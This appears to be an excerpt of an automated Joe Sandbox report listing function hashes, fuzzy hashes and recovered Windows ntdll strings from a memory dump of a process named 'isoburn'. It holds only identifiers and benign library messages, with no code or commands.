                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: 8cdcbc555f9cbedede07ad0d9d72154a79c127267ebc79f0d64a2828c399231e
                                                                            • Instruction ID: 64f33e4b4e2b508e565215b4ad692737b378655549d22cfcca632ea328754ae9
                                                                            • Opcode Fuzzy Hash: 8cdcbc555f9cbedede07ad0d9d72154a79c127267ebc79f0d64a2828c399231e
                                                                            • Instruction Fuzzy Hash: 7151E3316003197ADF11EAA4FC89FFDB7A9FF18700F1404A9E505AB191EB719A41CE64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction ID: 86825ddecfc786559abaa11584efb69a22b6491614e39db4d180916569ea1385
                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction Fuzzy Hash: 3681B270E092499EDF68CE68E951BFEBBF2BF46310F38415AD892A7790C7349841CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            • Opcode ID: 091943a8de180688032083e8f314b8d18945759e5b5656384bf9a7b7f23df778
                                                                            • Instruction ID: 3e8c2b3ab67d290b900d6a1ab3b9c138101c2a832cd3c4e698554132be5c5ada
                                                                            • Opcode Fuzzy Hash: 091943a8de180688032083e8f314b8d18945759e5b5656384bf9a7b7f23df778
                                                                            • Instruction Fuzzy Hash: B921517BA00119ABDB14DE69DC94AFFBBE9AF54650F080116ED25E3200EB309A019BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051102E7
                                                                            • RTL: Re-Waiting, xrefs: 0511031E
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051102BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: c2bf5f25cef922bd3d368b5ee8d7f2a37527c56c750d5e585c53c959238b8ea1
                                                                            • Instruction ID: 9bc506470cbf259d462787048854b0843fcfa980356262b63880b5aba0b49954
                                                                            • Opcode Fuzzy Hash: c2bf5f25cef922bd3d368b5ee8d7f2a37527c56c750d5e585c53c959238b8ea1
                                                                            • Instruction Fuzzy Hash: 0AE1C2306087429FD725CF28D988B6EBBE2BF49314F140AADF5958B2D1D774E984CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05117B7F
                                                                            • RTL: Re-Waiting, xrefs: 05117BAC
                                                                            • RTL: Resource at %p, xrefs: 05117B8E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: c90d0d347b0909ec95c690f1db6e7d2c2a5542c13bc210317024a9292ecdf882
                                                                            • Instruction ID: 8d415bd639bc7bd10573b7e156149ae748f37fd303738b91d7a9806914c7717b
                                                                            • Opcode Fuzzy Hash: c90d0d347b0909ec95c690f1db6e7d2c2a5542c13bc210317024a9292ecdf882
                                                                            • Instruction Fuzzy Hash: 7D41BF317047029BCB20DE25E941B6EF7E6FF88710F110A2DE9969B681DB31E4058FA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0511728C
                                                                            Strings
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05117294
                                                                            • RTL: Re-Waiting, xrefs: 051172C1
                                                                            • RTL: Resource at %p, xrefs: 051172A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: 11288bfbda4ebdec1e856bd3d6b16e67a99b7bd9d339abe045a4390667bf33b2
                                                                            • Instruction ID: 35772bab0ad6d125b37badcbc26eac20e762b8107ff3520e8dbc1bf2ca7870f9
                                                                            • Opcode Fuzzy Hash: 11288bfbda4ebdec1e856bd3d6b16e67a99b7bd9d339abe045a4390667bf33b2
                                                                            • Instruction Fuzzy Hash: 6A41DE31704212ABCB21DE24DC41FAAB7A6FF44710F210629FD95AB380DB21E8128BE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: fd700bb9e1511a3a738ac43ab22ef30be5c35267af4253ff629e21e027511ca1
                                                                            • Instruction ID: 4a687980edc52a19499aaf08369cb3b961bd4a4e8e06e8d18a53f95bb0278bed
                                                                            • Opcode Fuzzy Hash: fd700bb9e1511a3a738ac43ab22ef30be5c35267af4253ff629e21e027511ca1
                                                                            • Instruction Fuzzy Hash: AA318476A00219DFCB64DE28DC44FEF77B8FB44610F544595ED69E3240EB30AA489BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction ID: 5b597c0ead498278bb811aca0fcf5cd28b28305ec3336d55a1b5cd3cd8b02828
                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction Fuzzy Hash: B9919270F0429A9FDB68DE69E881ABEB7F6FF44320F34451AE865E72D0E73099418750
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: fef1cd07f23fae9c32c727f60ddcb76216f0315c7b69b8763ae9e5d0d3ff59c8
                                                                            • Instruction ID: a355349c57e893836f704248985d4b0998fe9b99d8e74884cfeaf001414e5686
                                                                            • Opcode Fuzzy Hash: fef1cd07f23fae9c32c727f60ddcb76216f0315c7b69b8763ae9e5d0d3ff59c8
                                                                            • Instruction Fuzzy Hash: 70814E76E002699BDB35CB94DC48BEEB7B4AB08750F0445EAA919B7280D7709E80CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%